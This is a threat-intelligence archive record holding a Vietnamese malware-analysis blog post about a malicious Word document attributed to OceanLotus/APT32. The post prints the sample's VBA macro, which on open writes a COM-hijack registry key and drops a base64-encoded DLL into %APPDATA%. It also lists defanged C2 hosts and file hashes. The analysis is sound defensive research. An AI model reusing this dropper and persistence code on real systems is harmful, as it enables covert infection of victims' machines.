{
	"id": "34c97bb9-b66e-48b6-b0aa-122a6cf50c5b",
	"created_at": "2026-04-06T02:10:46.260043Z",
	"updated_at": "2026-04-10T03:36:22.195931Z",
	"deleted_at": null,
	"sha1_hash": "c489ff97d2bdfe6bc7a0ecc4cef5252fdf2b936a",
	"title": "Thưởng tết….",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1895234,
	"plain_text": "Thưởng tết….\r\nBy m4n0w4r\r\nPublished: 2019-06-02 · Archived: 2026-04-06 01:39:04 UTC\r\n5 min read\r\nMay 31, 2019\r\nVô tình nhặt được cái sample:\r\nhttps://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007/detection\r\nPress enter or click to view image in full size\r\nKĩ thuật sử dụng trong tài liệu này có vẻ liên quan đến OceanLotus (aka APT-32):\r\nhttps://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/\r\nThông tin metadata của sample:\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 1 of 8\n\nDạo vòng vòng trong sample để thu thập thêm thông tin: 😉\r\nPress enter or click to view image in full size\r\nToàn bộ VBA code của sample:\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 2 of 8\n\n' module: ThisDocumentAttribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nPrivate Sub Document_Open()\r\n On Error Resume Next\r\n Dim sAppData As String\r\n sAppData = Environ(\"APPDATA\")\r\n sAppData = sAppData \u0026 \"\\main_background.png\"\r\n Dim sAppDataNew As String\r\n sAppDataNew = Chr(34) \u0026 sAppData \u0026 Chr(34)\r\n Dim myWS As Object, strPath\r\n Set myWS = CreateObject(\"WScript.Shell\")\r\n Set fsoCheck = VBA.CreateObject(\"Scripting.FileSystemObject\")\r\n Dim iCheck As Boolean\r\n iCheck = False\r\n #If Win64 Then\r\n #Else\r\n If (fsoCheck.FileExists(\"C:\\Windows\\SysWOW64\\cmd.exe\") = True) Then\r\n iCheck = True\r\n Else\r\n iCheck = False\r\n End If\r\n #End If\r\n If iCheck = True Then\r\n Dim wsh As Object\r\n Set wsh = VBA.CreateObject(\"WScript.Shell\")\r\n Dim waitOnReturn As Boolean: waitOnReturn = True\r\n Dim windowStyle As Integer: 
windowStyle = 0\r\n wsh.Run \"cmd.exe /S /C reg add HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9\r\n Else\r\n If RegKeyExists(\"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\\") = False Then\r\n myWS.RegWrite \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\\", \"\", \"REG_SZ\"\r\n Else\r\n End If\r\n If RegKeyExists(\"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\r\n If RegKeyExists(\"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5FC3\r\n myWS.RegWrite \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5F\r\n Else\r\n End If\r\n myWS.RegWrite \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5FC354\r\n Else\r\n End If\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 3 of 8\n\nEnd If\r\n Dim b As String\r\n Dim a As String\r\n Dim tableNew As Table\r\n Set tableNew = ActiveDocument.Tables(1)\r\n If (iCheck = True) Then\r\n a = tableNew.Cell(1, 1).Range.Text\r\n a = Left(a, Len(a) - 2)\r\n b = Base64Decode(a, sAppData)\r\n Else\r\n a = tableNew.Cell(1, 2).Range.Text\r\n a = Left(a, Len(a) - 2)\r\n b = Base64Decode(a, sAppData)\r\n End If\r\nEnd Sub\r\nFunction RegKeyExists(i_RegKey As String) As Boolean\r\n Dim myWS As Object\r\n On Error GoTo ErrorHandler\r\n Set myWS = CreateObject(\"WScript.Shell\")\r\n myWS.RegRead i_RegKey\r\n RegKeyExists = True\r\n Exit Function\r\n ErrorHandler:\r\n 'key was not found\r\n RegKeyExists = False\r\nEnd Function\r\nFunction Base64Decode(ByVal vCode, ByVal sPath)\r\n Dim oXML, oNode\r\n Set oXML = CreateObject(\"Msxml2.DOMDocument.3.0\")\r\n Set oNode = oXML.CreateElement(\"base64\")\r\n oNode.dataType = \"bin.base64\"\r\n oNode.Text = vCode\r\n Set objStream = CreateObject(\"ADODB.Stream\")\r\n objStream.Type = 1\r\n objStream.Open\r\n objStream.Write oNode.nodeTypedValue\r\n objStream.SaveToFile sPath, 2\r\n Set objStream = Nothing\r\n Set oNode = Nothing\r\n 
Set oXML = Nothing\r\nEnd Function\r\nCơ bản VBA code này làm nhiệm vụ:\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 4 of 8\n\nCấu thành đường dẫn cho tập tin main_background.png: %APPDATA%\\main_background.png\r\nKiểm tra môi trường hiện hành là 32-bit hay 64-bit. Nếu là 64-bit thì sẽ thực thi lệnh:\r\nwsh.Run \"cmd.exe /S /C reg add HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5\r\nngược lại, thực thi lần lượt:\r\nmyWS.RegWrite \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\\\", \"\", \"R\r\nDựa vào từ khóa InprocServer32, ta có thể biết được file %APPDATA%\\main_background.png sẽ là\r\nmột tập tin dll\r\nSau khi thiết lập thành công Registry, tiến hành decode base64data và ghi ra file main_background.png. Dựa\r\nvào biến iCheck để drop ra dll x64 hay dll x32:\r\nSet tableNew = ActiveDocument.Tables(1)\r\n If (iCheck = True) Then\r\n a = tableNew.Cell(1, 1).Range.Text //lấy base64data tại hàng 1 cột 1 (32bit-dll)\r\n a = Left(a, Len(a) - 2)\r\n b = Base64Decode(a, sAppData)\r\n Else\r\n a = tableNew.Cell(1, 2).Range.Text //lấy base64data tại hàng 1 cột 2 (64-bit dll)\r\n a = Left(a, Len(a) - 2)\r\n b = Base64Decode(a, sAppData)\r\n End If\r\nPress enter or click to view image in full size\r\nCăn cứ vào thông tin có được tiến hành decode để lấy các binary. Có thể debug hoặc là dùng Cyberchef:\r\n32-bit dll:\r\nPress enter or click to view image in full size\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 5 of 8\n\n64-bit dll:\r\nPress enter or click to view image in full size\r\nTôi thấy attacker có vẻ hơi nhầm trong quá trình decode và ghi ra file. Nếu là OS 64-bit thì lại drop ra 32-\r\nbit dll. 
Còn ngược lại, với OS 32-bit lại drop ra 64-bit dll 😕\r\n(Lưu ý khi đọc đoạn này: #If Win64 là hằng biên dịch có điều kiện của VBA, phản ánh bitness của Office/host VBA chứ không phải của hệ điều hành. Nhánh Else chỉ được biên dịch trên Office 32-bit, và việc C:\\Windows\\SysWOW64\\cmd.exe tồn tại cho biết Office 32-bit đang chạy trên Windows 64-bit. Vì vậy trường hợp iCheck = True (Office 32-bit trên OS 64-bit) drop dll 32-bit có thể là chủ ý nếu dll được nạp qua InprocServer32 vào tiến trình 32-bit; chỉ có trường hợp Office 32-bit trên OS 32-bit bị drop dll 64-bit là rõ ràng không hợp lệ. Với Office 64-bit, iCheck luôn = False nên sẽ drop dll 64-bit.)\r\nKiểm tra sơ bộ các dll\r\nVới 32-bit dll:\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 6 of 8\n\n000000011530 000010013730 0 XA:\\Code\\Macro_NB2\\Request\\PostData32.exe -u hxxps://syn[.]servebbs\r\nVới 64-bit dll:\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\n000000014243 0000000141D0 0 YA:\\Code\\Macro_NB2\\Request\\PostData64.exe -u hxxps://syn[.]servebb\r\nThử load file về nhưng C2 đã dẹo:\r\nPress enter or click to view image in full size\r\nIOCs:\r\nDoc sample: 9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007\r\nGet m4n0w4r’s stories in your inbox\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 7 of 8\n\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nDropped file (based on architecture):\r\n32-bit dll: ee1e3956df9f69ae3c87a53075881f65\r\n64-bit dll: c74a24dea88999797aaceeecd63efaff\r\nSome C2:\r\nhxxps://word[.]webhop[.]info ( 109[.]248[.]149[.]96)\r\nhxxps://syn[.]servebbs[.]com ( 194[.]9[.]177[.]13)\r\nPress enter or click to view image in full size\r\nEnd.\r\nSource: https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nhttps://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7"
	],
	"report_names": [
		"th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441446,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c489ff97d2bdfe6bc7a0ecc4cef5252fdf2b936a.pdf",
		"text": "https://archive.orkl.eu/c489ff97d2bdfe6bc7a0ecc4cef5252fdf2b936a.txt",
		"img": "https://archive.orkl.eu/c489ff97d2bdfe6bc7a0ecc4cef5252fdf2b936a.jpg"
	}
}